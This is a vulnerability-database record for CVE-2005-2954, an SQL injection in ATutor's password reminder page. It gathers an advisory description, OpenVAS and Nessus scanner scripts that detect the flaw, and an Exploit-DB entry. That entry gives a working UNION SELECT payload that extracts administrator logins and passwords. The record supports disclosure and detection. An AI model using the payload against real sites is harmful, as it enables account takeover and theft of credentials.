ID CVE-2005-2954 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:33:00
Description
SQL injection vulnerability in password_reminder.php in ATutor before 1.5.1 pl1 allows remote attackers to execute arbitrary SQL commands via the email field.
{"osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-2954"], "edition": 1, "description": "## Vulnerability Description\nATutor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the password_reminder.php script not properly sanitizing user-supplied input to the 'email' field. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 1.5.1.pl1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nATutor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the password_reminder.php script not properly sanitizing user-supplied input to the 'email' field. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.atutor.ca/\n[Secunia Advisory ID:16813](https://secuniaresearch.flexerasoftware.com/advisories/16813/)\n[Related OSVDB ID: 19413](https://vulners.com/osvdb/OSVDB:19413)\n[Related OSVDB ID: 19412](https://vulners.com/osvdb/OSVDB:19412)\nOther Advisory URL: http://rgod.altervista.org/atutor151.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-09/0144.html\nISS X-Force ID: 22282\n[CVE-2005-2954](https://vulners.com/cve/CVE-2005-2954)\nBugtraq ID: 14831\n", "modified": "2005-09-14T13:14:56", "published": "2005-09-14T13:14:56", "href": "https://vulners.com/osvdb/OSVDB:19411", "id": "OSVDB:19411", "title": "ATutor password_reminder.php Email Field SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-12T15:08:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2954"], "description": "The remote version of ATutor contains an input validation flaw in\n the ", "modified": "2020-05-08T00:00:00", "published": "2006-03-26T00:00:00", "id": "OPENVAS:136141256231019765", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231019765", "type": "openvas", "title": "ATutor password reminder SQL injection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ATutor password reminder SQL injection\n#\n# Authors:\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atutor:atutor\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.19765\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2005-2954\");\n script_bugtraq_id(14831);\n\n script_name(\"ATutor password reminder SQL injection\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"gb_atutor_detect.nasl\");\n script_mandatory_keys(\"atutor/detected\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://retrogod.altervista.org/atutor151.html\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ATutor 1.5.1 pl1 or later.\");\n\n script_tag(name:\"summary\", value:\"The remote version of ATutor contains an input validation flaw in\n the 'password_reminder.php' script. This vulnerability occurs only when 'magic_quotes_gpc' is set to\n off in the 'php.ini' configuration file.\");\n\n script_tag(name:\"impact\", value:\"A malicious user can exploit this flaw to manipulate SQL queries and steal\n any user's password.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nvtstrings = get_vt_strings();\npostdata = string( \"form_password_reminder=true&\", \"form_email=%27\", vtstrings[\"lowercase\"], \"&\", \"submit=Submit\" );\n\nurl = dir + \"/password_reminder.php\";\nhost = http_host_name( port:port );\n\nreq = string( \"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\nif( \"mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T03:11:35", "description": "ATutor 1.5.1 Password_Reminder.PHP SQL Injection Vulnerability. CVE-2005-2954. Webapps exploit for php platform", "published": "2005-09-14T00:00:00", "type": "exploitdb", "title": "ATutor 1.5.1 Password_Reminder.PHP SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2954"], "modified": "2005-09-14T00:00:00", "id": "EDB-ID:26257", "href": "https://www.exploit-db.com/exploits/26257/", "sourceData": "source: http://www.securityfocus.com/bid/14831/info\r\n\r\nATutor is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nSuccessful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. \r\n\r\ngo to http://www.example.com/atutor/password_reminder.php\r\n\r\nand in the email field type:\r\n\r\n' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /* ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26257/"}], "nessus": [{"lastseen": "2021-01-20T09:25:07", "description": "The remote host is running ATutor, an open source, web-based, Learning\nContent Management System (LCMS) designed with accessibility and\nadaptability in mind. \n\nThe remote version of this software contains an input validation flaw\nin the 'password_reminder.php' script. This vulnerability occurs only\nwhen 'magic_quotes_gpc' is set to off in the 'php.ini' configuration\nfile. A malicious user can exploit this flaw to manipulate SQL\nqueries and steal any user's password.", "edition": 19, "published": "2005-09-20T00:00:00", "title": "ATutor Password Reminder SQL Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2954"], "modified": "2005-09-20T00:00:00", "cpe": [], "id": "ATUTOR_PASSWORD_REMINDER_SQL.NASL", "href": "https://www.tenable.com/plugins/nessus/19765", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n# GPLv2\n#\n\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(19765);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-2954\");\n script_bugtraq_id(14831);\n\n name[\"english\"] = \"ATutor Password Reminder SQL Injection\";\n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a PHP script vulnerable to a SQL injection\nattack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running ATutor, an open source, web-based, Learning\nContent Management System (LCMS) designed with accessibility and\nadaptability in mind. \n\nThe remote version of this software contains an input validation flaw\nin the 'password_reminder.php' script. This vulnerability occurs only\nwhen 'magic_quotes_gpc' is set to off in the 'php.ini' configuration\nfile. A malicious user can exploit this flaw to manipulate SQL\nqueries and steal any user's password.\" );\n # https://web.archive.org/web/20060524132340/http://retrogod.altervista.org/atutor151.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?173b81e7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ATutor 1.5.1 pl1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/09/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for SQL injection in password_reminder.php\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"(C) 2005-2021 Josh Zlatin-Amishav\");\n\n script_require_ports(\"Services/www\", 80);\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\nif (!get_port_state(port)) exit(0);\nif (!can_host_php(port:port)) exit(0);\n \npostdata = string(\n \"form_password_reminder=true&\",\n \"form_email=%27\", SCRIPT_NAME, \"&\",\n \"submit=Submit\"\n);\n\nforeach dir ( cgi_dirs() )\n{\n # Make sure the affected script exists.\n req = http_get(item:string(dir, \"/password_reminder.php\"), port:port);\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if (\n \"ATutor\" >< res &&\n '<input type=\"hidden\" name=\"form_password_reminder\"' >< res\n ) {\n req = string(\n \"POST \", dir, \"/password_reminder.php HTTP/1.1\\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if ( \"mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource\" >< res) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
